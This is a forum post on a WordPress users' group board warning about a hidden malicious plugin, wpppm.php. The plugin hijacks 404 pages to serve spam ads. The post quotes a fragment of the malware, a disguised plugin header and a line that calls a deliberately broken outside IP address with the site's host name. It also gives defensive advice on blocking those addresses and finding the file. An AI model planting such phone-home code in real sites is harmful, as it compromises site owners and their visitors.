SoCal WordPress Users' Group Message Board › Watch out for malicious "plugin" wpppm
I just tracked this down in a client's site.
While no plugin shows in the admin dashboard, in the plugin dir there's a wpppm/wpppm.php file (and a related subdir filled with files with random hash filenames). The way it works is it overrides the normal 404 behavior of your site and serves up a spam ad page for any URL that isn't otherwise a valid page, like yoursite.com/sdlfkjsldfkjsdflkjsdfs
The file starts with:
Plugin Name: Wordpress Plugin Manager
$u = "http://... 18.104.22.168/v.html?v=$ver&h=" . urlencode($_SERVER['HTTP_HOST']);
(I "broke" the URL above so it wouldn't be a valid link)
So most people would think it's a standard WP file, but notice the name of the function: fourofour = 404
If you enter that url into your browser you get (at least I did) 22.214.171.124
and if you enter that into your browser you get the "HYDROXYCITRIC" spam page that will be injected into your site.
You might want to block those addresses in your firewall and search your servers for this wpppm.php.
After the fact found this article on it: http://blog.sucuri.ne...
Interestingly, if you Google wpppm.php you'll find about 6,500 sites infected by this!
todd at toddzebert dot com